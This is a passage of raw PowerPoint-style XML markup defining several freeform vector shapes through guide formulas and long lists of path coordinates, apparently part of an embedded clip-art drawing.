                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17"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4128" name="Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683" y="2485"/>
                <a:ext cx="46" cy="8"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 141"/>
                  <a:gd name="T1" fmla="*/ 0 h 25"/>
                  <a:gd name="T2" fmla="*/ 0 w 141"/>
                  <a:gd name="T3" fmla="*/ 0 h 25"/>
                  <a:gd name="T4" fmla="*/ 0 w 141"/>
                  <a:gd name="T5" fmla="*/ 0 h 25"/>
                  <a:gd name="T6" fmla="*/ 0 w 141"/>
                  <a:gd name="T7" fmla="*/ 0 h 25"/>
                  <a:gd name="T8" fmla="*/ 0 w 141"/>
                  <a:gd name="T9" fmla="*/ 0 h 25"/>
                  <a:gd name="T10" fmla="*/ 0 w 141"/>
                  <a:gd name="T11" fmla="*/ 0 h 25"/>
                  <a:gd name="T12" fmla="*/ 0 w 141"/>
                  <a:gd name="T13" fmla="*/ 0 h 25"/>
                  <a:gd name="T14" fmla="*/ 0 w 141"/>
                  <a:gd name="T15" fmla="*/ 0 h 25"/>
                  <a:gd name="T16" fmla="*/ 0 w 141"/>
                  <a:gd name="T17" fmla="*/ 0 h 25"/>
                  <a:gd name="T18" fmla="*/ 0 w 141"/>
                  <a:gd name="T19" fmla="*/ 0 h 25"/>
                  <a:gd name="T20" fmla="*/ 0 w 141"/>
                  <a:gd name="T21" fmla="*/ 0 h 25"/>
                  <a:gd name="T22" fmla="*/ 0 w 141"/>
                  <a:gd name="T23" fmla="*/ 0 h 25"/>
                  <a:gd name="T24" fmla="*/ 0 w 141"/>
                  <a:gd name="T25" fmla="*/ 0 h 25"/>
                  <a:gd name="T26" fmla="*/ 0 w 141"/>
                  <a:gd name="T27" fmla="*/ 0 h 25"/>
                  <a:gd name="T28" fmla="*/ 0 w 141"/>
                  <a:gd name="T29" fmla="*/ 0 h 25"/>
                  <a:gd name="T30" fmla="*/ 0 w 141"/>
                  <a:gd name="T31" fmla="*/ 0 h 25"/>
                  <a:gd name="T32" fmla="*/ 0 w 141"/>
                  <a:gd name="T33" fmla="*/ 0 h 25"/>
                  <a:gd name="T34" fmla="*/ 0 w 141"/>
                  <a:gd name="T35" fmla="*/ 0 h 25"/>
                  <a:gd name="T36" fmla="*/ 0 w 141"/>
                  <a:gd name="T37" fmla="*/ 0 h 25"/>
                  <a:gd name="T38" fmla="*/ 0 w 141"/>
                  <a:gd name="T39" fmla="*/ 0 h 25"/>
                  <a:gd name="T40" fmla="*/ 0 w 141"/>
                  <a:gd name="T41" fmla="*/ 0 h 25"/>
                  <a:gd name="T42" fmla="*/ 0 w 141"/>
                  <a:gd name="T43" fmla="*/ 0 h 25"/>
                  <a:gd name="T44" fmla="*/ 0 w 141"/>
                  <a:gd name="T45" fmla="*/ 0 h 25"/>
                  <a:gd name="T46" fmla="*/ 0 w 141"/>
                  <a:gd name="T47" fmla="*/ 0 h 25"/>
                  <a:gd name="T48" fmla="*/ 0 w 141"/>
                  <a:gd name="T49" fmla="*/ 0 h 25"/>
                  <a:gd name="T50" fmla="*/ 0 w 141"/>
                  <a:gd name="T51" fmla="*/ 0 h 25"/>
                  <a:gd name="T52" fmla="*/ 0 w 141"/>
                  <a:gd name="T53" fmla="*/ 0 h 25"/>
                  <a:gd name="T54" fmla="*/ 0 w 141"/>
                  <a:gd name="T55" fmla="*/ 0 h 25"/>
                  <a:gd name="T56" fmla="*/ 0 w 141"/>
                  <a:gd name="T57" fmla="*/ 0 h 25"/>
                  <a:gd name="T58" fmla="*/ 0 w 141"/>
                  <a:gd name="T59" fmla="*/ 0 h 25"/>
                  <a:gd name="T60" fmla="*/ 0 w 141"/>
                  <a:gd name="T61" fmla="*/ 0 h 25"/>
                  <a:gd name="T62" fmla="*/ 0 w 141"/>
                  <a:gd name="T63" fmla="*/ 0 h 25"/>
                  <a:gd name="T64" fmla="*/ 0 w 141"/>
                  <a:gd name="T65" fmla="*/ 0 h 25"/>
                  <a:gd name="T66" fmla="*/ 0 w 141"/>
                  <a:gd name="T67" fmla="*/ 0 h 25"/>
                  <a:gd name="T68" fmla="*/ 0 w 141"/>
                  <a:gd name="T69" fmla="*/ 0 h 25"/>
                  <a:gd name="T70" fmla="*/ 0 w 141"/>
                  <a:gd name="T71" fmla="*/ 0 h 25"/>
                  <a:gd name="T72" fmla="*/ 0 w 141"/>
                  <a:gd name="T73" fmla="*/ 0 h 25"/>
                  <a:gd name="T74" fmla="*/ 0 w 141"/>
                  <a:gd name="T75" fmla="*/ 0 h 25"/>
                  <a:gd name="T76" fmla="*/ 0 w 141"/>
                  <a:gd name="T77" fmla="*/ 0 h 25"/>
                  <a:gd name="T78" fmla="*/ 0 w 141"/>
                  <a:gd name="T79" fmla="*/ 0 h 25"/>
                  <a:gd name="T80" fmla="*/ 0 w 141"/>
                  <a:gd name="T81" fmla="*/ 0 h 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5"/>
                  <a:gd name="T125" fmla="*/ 141 w 141"/>
                  <a:gd name="T126" fmla="*/ 25 h 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5">
                    <a:moveTo>
                      <a:pt x="1" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1"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4129" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="642" y="2483"/>
                <a:ext cx="19" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 58"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 58"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 0 w 58"/>
                  <a:gd name="T5" fmla="*/ 0 h 32"/>
                  <a:gd name="T6" fmla="*/ 0 w 58"/>
                  <a:gd name="T7" fmla="*/ 0 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 58"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 58"/>
                  <a:gd name="T11" fmla="*/ 0 h 32"/>
                  <a:gd name="T12" fmla="*/ 0 w 58"/>
                  <a:gd name="T13" fmla="*/ 0 h 32"/>
                  <a:gd name="T14" fmla="*/ 0 w 58"/>
                  <a:gd name="T15" fmla="*/ 0 h 32"/>
                  <a:gd name="T16" fmla="*/ 0 w 58"/>
                  <a:gd name="T17" fmla="*/ 0 h 32"/>
                  <a:gd name="T18" fmla="*/ 0 w 58"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 0 w 58"/>
                  <a:gd name="T21" fmla="*/ 0 h 32"/>
                  <a:gd name="T22" fmla="*/ 0 w 58"/>
                  <a:gd name="T23" fmla="*/ 0 h 32"/>
                  <a:gd name="T24" fmla="*/ 0 w 58"/>
                  <a:gd name="T25" fmla="*/ 0 h 32"/>
                  <a:gd name="T26" fmla="*/ 0 w 58"/>
                  <a:gd name="T27" fmla="*/ 0 h 32"/>
                  <a:gd name="T28" fmla="*/ 0 w 58"/>
                  <a:gd name="T29" fmla="*/ 0 h 32"/>
                  <a:gd name="T30" fmla="*/ 0 w 58"/>
                  <a:gd name="T31" fmla="*/ 0 h 32"/>
                  <a:gd name="T32" fmla="*/ 0 w 58"/>
                  <a:gd name="T33" fmla="*/ 0 h 32"/>
                  <a:gd name="T34" fmla="*/ 0 w 58"/>
                  <a:gd name="T35" fmla="*/ 0 h 32"/>
                  <a:gd name="T36" fmla="*/ 0 w 58"/>
                  <a:gd name="T37" fmla="*/ 0 h 32"/>
                  <a:gd name="T38" fmla="*/ 0 w 58"/>
                  <a:gd name="T39" fmla="*/ 0 h 32"/>
                  <a:gd name="T40" fmla="*/ 0 w 58"/>
                  <a:gd name="T41" fmla="*/ 0 h 32"/>
                  <a:gd name="T42" fmla="*/ 0 w 58"/>
                  <a:gd name="T43" fmla="*/ 0 h 32"/>
                  <a:gd name="T44" fmla="*/ 0 w 58"/>
                  <a:gd name="T45" fmla="*/ 0 h 32"/>
                  <a:gd name="T46" fmla="*/ 0 w 58"/>
                  <a:gd name="T47" fmla="*/ 0 h 32"/>
                  <a:gd name="T48" fmla="*/ 0 w 58"/>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32"/>
                  <a:gd name="T77" fmla="*/ 58 w 58"/>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32">
                    <a:moveTo>
                      <a:pt x="3" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="1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4130" name="Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="620" y="2484"/>
                <a:ext cx="12" cy="14"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 39"/>
                  <a:gd name="T1" fmla="*/ 0 h 41"/>
                  <a:gd name="T2" fmla="*/ 0 w 39"/>
                  <a:gd name="T3" fmla="*/ 0 h 41"/>
                  <a:gd name="T4" fmla="*/ 0 w 39"/>
                  <a:gd name="T5" fmla="*/ 0 h 41"/>
                  <a:gd name="T6" fmla="*/ 0 w 39"/>
                  <a:gd name="T7" fmla="*/ 0 h 41"/>
                  <a:gd name="T8" fmla="*/ 0 w 39"/>
                  <a:gd name="T9" fmla="*/ 0 h 41"/>
                  <a:gd name="T10" fmla="*/ 0 w 39"/>
                  <a:gd name="T11" fmla="*/ 0 h 41"/>
                  <a:gd name="T12" fmla="*/ 0 w 39"/>
                  <a:gd name="T13" fmla="*/ 0 h 41"/>
                  <a:gd name="T14" fmla="*/ 0 w 39"/>
                  <a:gd name="T15" fmla="*/ 0 h 41"/>
                  <a:gd name="T16" fmla="*/ 0 w 39"/>
                  <a:gd name="T17" fmla="*/ 0 h 41"/>
                  <a:gd name="T18" fmla="*/ 0 w 39"/>
                  <a:gd name="T19" fmla="*/ 0 h 41"/>
                  <a:gd name="T20" fmla="*/ 0 w 39"/>
                  <a:gd name="T21" fmla="*/ 0 h 41"/>
                  <a:gd name="T22" fmla="*/ 0 w 39"/>
                  <a:gd name="T23" fmla="*/ 0 h 41"/>
                  <a:gd name="T24" fmla="*/ 0 w 39"/>
                  <a:gd name="T25" fmla="*/ 0 h 41"/>
                  <a:gd name="T26" fmla="*/ 0 w 39"/>
                  <a:gd name="T27" fmla="*/ 0 h 41"/>
                  <a:gd name="T28" fmla="*/ 0 w 39"/>
                  <a:gd name="T29" fmla="*/ 0 h 41"/>
                  <a:gd name="T30" fmla="*/ 0 w 39"/>
                  <a:gd name="T31" fmla="*/ 0 h 41"/>
                  <a:gd name="T32" fmla="*/ 0 w 39"/>
                  <a:gd name="T33" fmla="*/ 0 h 41"/>
                  <a:gd name="T34" fmla="*/ 0 w 39"/>
                  <a:gd name="T35" fmla="*/ 0 h 41"/>
                  <a:gd name="T36" fmla="*/ 0 w 39"/>
                  <a:gd name="T37" fmla="*/ 0 h 41"/>
                  <a:gd name="T38" fmla="*/ 0 w 39"/>
                  <a:gd name="T39" fmla="*/ 0 h 41"/>
                  <a:gd name="T40" fmla="*/ 0 w 39"/>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41"/>
                  <a:gd name="T65" fmla="*/ 39 w 39"/>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41">
                    <a:moveTo>
                      <a:pt x="0" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>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4131" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="604" y="2491"/>
                <a:ext cx="39" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 118"/>
                  <a:gd name="T1" fmla="*/ 0 h 83"/>
                  <a:gd name="T2" fmla="*/ 0 w 118"/>
                  <a:gd name="T3" fmla="*/ 0 h 83"/>
                  <a:gd name="T4" fmla="*/ 0 w 118"/>
                  <a:gd name="T5" fmla="*/ 0 h 83"/>
                  <a:gd name="T6" fmla="*/ 0 w 118"/>
                  <a:gd name="T7" fmla="*/ 0 h 83"/>
                  <a:gd name="T8" fmla="*/ 0 w 118"/>
                  <a:gd name="T9" fmla="*/ 0 h 83"/>
                  <a:gd name="T10" fmla="*/ 0 w 118"/>
                  <a:gd name="T11" fmla="*/ 0 h 83"/>
                  <a:gd name="T12" fmla="*/ 0 w 118"/>
                  <a:gd name="T13" fmla="*/ 0 h 83"/>
                  <a:gd name="T14" fmla="*/ 0 w 118"/>
                  <a:gd name="T15" fmla="*/ 0 h 83"/>
                  <a:gd name="T16" fmla="*/ 0 w 118"/>
                  <a:gd name="T17" fmla="*/ 0 h 83"/>
                  <a:gd name="T18" fmla="*/ 0 w 118"/>
                  <a:gd name="T19" fmla="*/ 0 h 83"/>
                  <a:gd name="T20" fmla="*/ 0 w 118"/>
                  <a:gd name="T21" fmla="*/ 0 h 83"/>
                  <a:gd name="T22" fmla="*/ 0 w 118"/>
                  <a:gd name="T23" fmla="*/ 0 h 83"/>
                  <a:gd name="T24" fmla="*/ 0 w 118"/>
                  <a:gd name="T25" fmla="*/ 0 h 83"/>
                  <a:gd name="T26" fmla="*/ 0 w 118"/>
                  <a:gd name="T27" fmla="*/ 0 h 83"/>
                  <a:gd name="T28" fmla="*/ 0 w 118"/>
                  <a:gd name="T29" fmla="*/ 0 h 83"/>
                  <a:gd name="T30" fmla="*/ 0 w 118"/>
                  <a:gd name="T31" fmla="*/ 0 h 83"/>
                  <a:gd name="T32" fmla="*/ 0 w 118"/>
                  <a:gd name="T33" fmla="*/ 0 h 83"/>
                  <a:gd name="T34" fmla="*/ 0 w 118"/>
                  <a:gd name="T35" fmla="*/ 0 h 83"/>
                  <a:gd name="T36" fmla="*/ 0 w 118"/>
                  <a:gd name="T37" fmla="*/ 0 h 83"/>
                  <a:gd name="T38" fmla="*/ 0 w 118"/>
                  <a:gd name="T39" fmla="*/ 0 h 83"/>
                  <a:gd name="T40" fmla="*/ 0 w 118"/>
                  <a:gd name="T41" fmla="*/ 0 h 83"/>
                  <a:gd name="T42" fmla="*/ 0 w 118"/>
                  <a:gd name="T43" fmla="*/ 0 h 83"/>
                  <a:gd name="T44" fmla="*/ 0 w 118"/>
                  <a:gd name="T45" fmla="*/ 0 h 83"/>
                  <a:gd name="T46" fmla="*/ 0 w 118"/>
                  <a:gd name="T47" fmla="*/ 0 h 83"/>
                  <a:gd name="T48" fmla="*/ 0 w 118"/>
                  <a:gd name="T49" fmla="*/ 0 h 83"/>
                  <a:gd name="T50" fmla="*/ 0 w 118"/>
                  <a:gd name="T51" fmla="*/ 0 h 83"/>
                  <a:gd name="T52" fmla="*/ 0 w 118"/>
                  <a:gd name="T53" fmla="*/ 0 h 83"/>
                  <a:gd name="T54" fmla="*/ 0 w 118"/>
                  <a:gd name="T55" fmla="*/ 0 h 83"/>
                  <a:gd name="T56" fmla="*/ 0 w 118"/>
                  <a:gd name="T57" fmla="*/ 0 h 83"/>
                  <a:gd name="T58" fmla="*/ 0 w 118"/>
                  <a:gd name="T59" fmla="*/ 0 h 83"/>
                  <a:gd name="T60" fmla="*/ 0 w 118"/>
                  <a:gd name="T61" fmla="*/ 0 h 83"/>
                  <a:gd name="T62" fmla="*/ 0 w 118"/>
                  <a:gd name="T63" fmla="*/ 0 h 83"/>
                  <a:gd name="T64" fmla="*/ 0 w 118"/>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83"/>
                  <a:gd name="T101" fmla="*/ 118 w 118"/>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83">
                    <a:moveTo>
                      <a:pt x="3" y="75"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="9" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="75"/>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4132" name="Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="482" y="2551"/>
                <a:ext cx="61" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 188"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 188"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 188"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 188"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 188"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 188"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 188"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 188"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 188"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 188"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 188"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 188"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 188"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 188"/>
                  <a:gd name="T33" fmla="*/ 0 h 71"/>
                  <a:gd name="T34" fmla="*/ 0 w 188"/>
                  <a:gd name="T35" fmla="*/ 0 h 71"/>
                  <a:gd name="T36" fmla="*/ 0 w 188"/>
                  <a:gd name="T37" fmla="*/ 0 h 71"/>
                  <a:gd name="T38" fmla="*/ 0 w 188"/>
                  <a:gd name="T39" fmla="*/ 0 h 71"/>
                  <a:gd name="T40" fmla="*/ 0 w 188"/>
                  <a:gd name="T41" fmla="*/ 0 h 71"/>
                  <a:gd name="T42" fmla="*/ 0 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 71"/>
                  <a:gd name="T44" fmla="*/ 0 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 71"/>
                  <a:gd name="T46" fmla="*/ 0 w 188"/>
                  <a:gd name="T47" fmla="*/ 0 h 71"/>
                  <a:gd name="T48" fmla="*/ 0 w 188"/>
                  <a:gd name="T49" fmla="*/ 0 h 71"/>
                  <a:gd name="T50" fmla="*/ 0 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 71"/>
                  <a:gd name="T52" fmla="*/ 0 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 71"/>
                  <a:gd name="T54" fmla="*/ 0 w 188"/>
                  <a:gd name="T55" fmla="*/ 0 h 71"/>
                  <a:gd name="T56" fmla="*/ 0 w 188"/>
                  <a:gd name="T57" fmla="*/ 0 h 71"/>
                  <a:gd name="T58" fmla="*/ 0 w 188"/>
                  <a:gd name="T59" fmla="*/ 0 h 71"/>
                  <a:gd name="T60" fmla="*/ 0 w 188"/>
                  <a:gd name="T61" fmla="*/ 0 h 71"/>
                  <a:gd name="T62" fmla="*/ 0 w 188"/>
                  <a:gd name="T63" fmla="*/ 0 h 71"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 0 h 71"/>
                  <a:gd name="T66" fmla="*/ 0 w 188"/>
                  <a:gd name="T67" fmla="*/ 0 h 71"/>
                  <a:gd name="T68" fmla="*/ 0 w 188"/>
